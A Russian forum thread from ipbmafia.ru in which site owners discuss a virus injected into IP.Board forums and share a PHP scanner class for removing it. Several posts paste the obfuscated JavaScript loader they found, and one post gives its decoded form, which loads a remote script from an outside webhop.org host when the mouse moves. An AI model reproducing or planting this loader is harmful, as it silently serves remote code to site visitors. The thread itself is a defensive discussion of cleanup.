try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$50$58$53$59.5$55.5$56$51.5$51$51.5$22$51$54.5$53.5$49.5$53$51.5$54$57.5$59$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$
47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);} возможно это оффтоп, поэтому заранее извеняюсь заметил что при редактировании сообщений на форуме не загружаеться редактор, я думал это связано с вирусом но вот и на вешем форуме также не загружаеться (вернее загружаеться но не всегда) Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4580 Share on other sites Больше вариантов
18 мая, 201212 yr Author comment_4582 Расшифровка данного скрипта: (function() { var url = '__smmxkycxsu.webhop.org/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function () { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); [/CODE] Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4582 Share on other sites Больше вариантов
18 мая, 201212 yr comment_4583 Ещё антивирус в cPanel поначалу ругался на троян, но теперь перестал, хотя я точно знаю, что эта бяка ещё есть. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4583 Share on other sites Больше вариантов
18 мая, 201212 yr comment_4585 вот этот код: try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$50$58$53$59.5$55.5$56$51.5$51$51.5$22$51$54.5$53.5$49.5$53$51.5$54$57.5$59$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$
51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);} 
try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$2
9.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} возможно это оффтоп, поэтому заранее извеняюсь заметил что при редактировании сообщений на форуме не загружаеться редактор, я думал это связано с вирусом но вот и на вешем форуме также не загружаеться (вернее загружаеться но не всегда) Установите вот это дополнение для Firefox и вы будете видеть весь JS код форума, уже в нормальном, а не в обфусцированном виде. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4585 Share on other sites Больше вариантов
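9 ноября, 201211 yr comment_14434 Вот скрипт:
<?php
/* ----------------------------------------------------------------------------------
   dScaner Class - START
   ---------------------------------------------------------------------------------- */
/*
 * dScaner - walks a directory tree, looks at files of a given type and
 * reports (find), strips (scan) or undoes the stripping (restore_backups) of
 * lines that contain a marker string, e.g. a fragment of injected JavaScript.
 *
 * Developer: Denis Ushakov
 * Date: 03-04-2012
 * Version: 0.0.3
 *
 * NOTE: the class performs no authentication of its own and scan() rewrites
 * files in place. When it is driven from a URL on a live host, run it once and
 * remove it from the web root afterwards.
 */
class dScaner
{
    // Directory entries that are never descended into or scanned.
    private $dir_disallow = array('.', '..', '.htaccess', '.git');

    // Turns a separated parameter list into an array.
    // $get_str   - the list, e.g. "a,b,c"
    // $separator - the separator used in the list
    // Returns the array, or false when $get_str is unset or empty.
    function request($get_str, $separator)
    {
        // empty() also covers the null/unset case the original tested with isset().
        if (empty($get_str)) {
            return false;
        }
        return explode($separator, $get_str);
    }

    /*
     * Reports every file that contains the requested string:
     *
     *   $this->find($path, $files_allowed, $requested_string);
     *
     * $path             - directory to start from
     * $files_allowed    - substring a file name must contain (e.g. '.js')
     * $requested_string - text to search for
     */
    function find($path = './', $files_allowed, $requested_string)
    {
        // An empty needle would match every file (strpos('', ...) is 0 on PHP 8).
        if ($requested_string === '' || $requested_string === null) {
            return;
        }
        foreach ($this->list_files($path, $files_allowed, true) as $in_dir_file) {
            $contents = file_get_contents($in_dir_file);
            // Searching the whole file gives the same answer as the original
            // line-by-line search, without splitting the file first.
            if ($contents !== false && strpos($contents, $requested_string) !== false) {
                $this->report($in_dir_file, " - в файле обнаружена искомая строка.", true);
            }
        }
    }

    /*
     * Removes every line that contains the marker string from matching files,
     * keeping an untouched copy next to each rewritten file as <name>_BACKUP:
     *
     *   $this->scan($path, $files_allowed, $requested_string);
     *
     * $path             - directory to start from
     * $files_allowed    - substring a file name must contain (e.g. '.js')
     * $requested_string - text that identifies an injected line
     *
     * The original chmod()'d the directory to 0777 around the write; that is
     * dropped here. Writing an existing file needs write permission on the
     * file, not the directory, and leaving a world-writable directory behind
     * on a host that is already compromised is a risk in itself. If a write
     * fails it is reported instead.
     */
    function scan($path = './', $files_allowed, $requested_string)
    {
        // Guard against wiping every line of every file with an empty needle.
        if ($requested_string === '' || $requested_string === null) {
            return;
        }
        foreach ($this->list_files($path, $files_allowed, true) as $in_dir_file) {
            $original = file_get_contents($in_dir_file);
            if ($original === false || strpos($original, $requested_string) === false) {
                continue;
            }
            // Drop the lines that carry the marker; everything else is kept
            // byte-for-byte. "\n" is the real line separator - the listing as
            // posted had lost the backslash and would have split on the letter n.
            $kept = array();
            foreach (explode("\n", $original) as $line) {
                if (strpos($line, $requested_string) === false) {
                    $kept[] = $line;
                }
            }
            $cleaned = implode("\n", $kept);
            // Backup first, then rewrite; compare with false because a cleaned
            // file can legitimately be 0 bytes and the original's truthiness
            // test reported that as a failure.
            if (file_put_contents($in_dir_file . '_BACKUP', $original) === false
                || file_put_contents($in_dir_file, $cleaned) === false) {
                $this->report($in_dir_file, " - Файл НЕ очищен.", false);
            } else {
                $this->report($in_dir_file, " - Файл очищен. (+ BACKUP)", true);
            }
        }
    }

    /*
     * Puts the <name>_BACKUP copies written by scan() back in place:
     *
     *   $this->restore_backups($path, $files_allowed);
     *
     * $path          - directory to start from
     * $files_allowed - substring a file name must contain (e.g. '.js')
     */
    function restore_backups($path = './', $files_allowed)
    {
        foreach ($this->list_files($path, $files_allowed, false) as $in_dir_file) {
            $backup = $in_dir_file . '_BACKUP';
            if (!is_file($backup)) {
                continue;
            }
            $saved = file_get_contents($backup);
            if ($saved !== false && file_put_contents($in_dir_file, $saved) !== false) {
                // Delete the backup by the same path it was just read from. The
                // original built a DOCUMENT_ROOT-based path here, which only
                // matched when the script happened to run from the web root.
                unlink($backup);
                $this->report($in_dir_file, " - восстановлен.", true);
            } else {
                $this->report($in_dir_file, " - НЕ восстановлен.", false);
            }
        }
    }

    // Returns the full paths of every regular file under $path (recursively)
    // whose name contains $files_allowed.
    // $skip_backups - when true, files whose name contains '_BACKUP' are left out
    // Symbolic links are not followed, so a planted link can neither loop the
    // walk nor lead it outside the tree being cleaned.
    private function list_files($path, $files_allowed, $skip_backups)
    {
        $found = array();
        $path = rtrim($path, '/') . '/';
        if (!is_dir($path)) {
            return $found;
        }
        $handle = opendir($path);
        if ($handle === false) {
            return $found;
        }
        while (false !== ($entry = readdir($handle))) {
            if (in_array($entry, $this->dir_disallow, true)) {
                continue;
            }
            $full = $path . $entry;
            if (is_link($full)) {
                continue;
            }
            if (is_dir($full)) {
                $found = array_merge(
                    $found,
                    $this->list_files($full . '/', $files_allowed, $skip_backups)
                );
            } elseif (is_file($full)
                // Strict comparisons: the original's "== true" / "== false"
                // mis-handled a match at offset 0.
                && strpos($entry, $files_allowed) !== false
                && (!$skip_backups || strpos($entry, '_BACKUP') === false)) {
                $found[] = $full;
            }
        }
        closedir($handle);
        return $found;
    }

    // Prints one status line in the inline-styled <span> the original used.
    // $ok picks the green (success) or red (failure) style. The file name is
    // HTML-escaped: on a compromised host file names are attacker-controlled
    // and were previously echoed into the page verbatim.
    private function report($file, $message, $ok)
    {
        $style = $ok
            ? "border:1px solid #1f4f18; background-color:#d5f5ce;"
            : "border:1px solid #822121; background-color:#ea7575;";
        print "<span style='display:block; padding:5px; " . $style
            . " font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>"
            . htmlspecialchars($file, ENT_QUOTES, 'UTF-8') . $message . " </span> ";
    }
}
/* ----------------------------------------------------------------------------------
   dScaner Class - END
   ---------------------------------------------------------------------------------- */
?>
Выкладывай, посмотрим что у тебя за код.. Права изменять бесполезно - злоумышленник при внедрении вредоносного кода имеет доступ к файлам через FTP. Как воспользоваться этим скриптом? Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14434 Share on other sites Больше вариантов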
9 ноября, 201211 yr Author comment_14468 Прочитать комментарии в скрипте, что-то подредактировать согласно комментариям и обратиться к скрипту из адресной строки. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14468 Share on other sites Больше вариантов
10 ноября, 201211 yr comment_14497 Прочитать комментарии в скрипте, что-то подредактировать согласно комментариям и обратиться к скрипту из адресной строки. А в каком формате его сохранить нужно? ".js" ? Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14497 Share on other sites Больше вариантов
10 ноября, 201211 yr Author comment_14505 Нет, в .php Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14505 Share on other sites Больше вариантов
10 ноября, 201211 yr comment_14530 Нет, в .php Я, если честно, вообще не разбираюсь в кодах... Вы можете подсказать, что нужно отредактировать? Я могу скопировать и сохранить в формате PHP, но дальше я вообще не бум-бум, что делать... Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14530 Share on other sites Больше вариантов
12 ноября, 201211 yr Author comment_14736 (первый параметр — стартовая директория поиска, второй — тип файлов, участвующих в поиске, третий — строка поиска) Пример: В самый низ добавляешь: $ipbmafia = new dScaner; $ipbmafia->find('./', '.js', 'Array'); $ipbmafia->scan('./', '.js', '=Array.prototype.slice.call(arguments).join(""),'); У тебя будут свои значения. Если искомый текст будет обнаружен, то сканер выведет эти файлы на экран. Скрипт не требует авторизации, а scan() перезаписывает файлы, поэтому после проверки удали его с сервера. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14736 Share on other sites Больше вариантов
5 декабря, 201211 yr comment_16203 Паш, проверь, пожалуйста, мой сайт на вирусняк. У меня пользователей перекидывает на другой сайт. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=16203 Share on other sites Больше вариантов
20 августа, 20177 yr comment_134996 Доброго дня всем! Подниму тему: недавно Яндекс обнаружил у меня на форуме вирусы... При этом Google не ругается, но Яша пометил сайт как заражённый. Найти вирус не могу, удалить тем более. Что делать, подскажите? Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=134996 Share on other sites Больше вариантов
20 августа, 20177 yr comment_134998 14 минут назад, iliah сказал: что делать подскажите? Как вариант, откатить из бэкапа! Пора бы уже переползать на IPS4 Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=134998 Share on other sites Больше вариантов
20 августа, 20177 yr comment_134999 3 минуты назад, Sipsb сказал: Как вариант, откатить из бэкапа! Пора бы уже переползать на IPS4 Видел в 15 году тут тему, как правильно перейти на ИПС 4, сейчас не получается найти. Лицензия есть, только надо продлить. И возможно ли автоматически обновиться с 345 на 4.0? Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=134999 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135000 1 минуту назад, iliah сказал: видел в 15 году тут тему как правильно перейти на ипс 4 сейчас не получается найти Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135000 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135001 8 минут назад, Sipsb сказал: Для исключения вирусов, я б конечно хотел снести весь форум к ядреной бабушке, и файлы с базой восстановить на свежей четверке. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135001 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135002 1 минуту назад, iliah сказал: я б конечно хотел снести весь форум к ядреной бабушке, и файлы с базой восстановить на свежей четверке. Это правильно! Думаю, лучше переустановить на чистую 3-ку, а затем обновить до 4-ки. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135002 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135003 Только что, Sipsb сказал: Это правильно! Думаю, лучше переустановить на чистую 3-ку, а затем обновить до 4-ки. Вооо, а это идея, чёт я сразу не допёр. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135003 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135004 3 минуты назад, iliah сказал: вооо а это идея, чет я сразу не допер Вот Вам в помощь Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135004 Share on other sites Больше вариантов